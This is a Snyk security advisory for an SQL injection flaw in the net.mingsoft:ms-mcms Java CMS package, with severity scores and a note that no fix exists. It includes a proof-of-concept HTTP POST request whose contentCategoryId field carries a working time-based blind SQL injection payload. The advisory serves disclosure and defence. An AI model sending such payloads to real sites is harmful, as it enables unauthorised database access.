SQL Injection Affecting net.mingsoft:ms-mcms package, versions [0,]


0.0
high

Snyk CVSS

    Exploit Maturity Proof of concept
    Attack Complexity Low
    Scope Changed
    Confidentiality High
Expand this section
NVD
9.8 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JAVA-NETMINGSOFT-2404812
  • published 18 Feb 2022
  • disclosed 18 Feb 2022
  • credit chauncyman

How to fix?

There is no fixed version for net.mingsoft:ms-mcms.

Overview

Affected versions of this package are vulnerable to SQL Injection due to improper input sanitization in categoryId parameter in ContentBizImpl.java.

PoC:

POST /ms/cms/content/list.do HTTP/1.1
Host: cms.demo.mingsoft.net
Content-Length: 21
Pragma: no-cache
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://cms.demo.mingsoft.net
Referer: http://cms.demo.mingsoft.net/ms/cms/category/form.do?id=158&childId=undefined
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ****
Connection: close

contentCategoryId=158'||(SELECT 0x7155656f WHERE 5755=5755 AND (SELECT 1979 FROM (SELECT(SLEEP(5)))dYQF))||'

References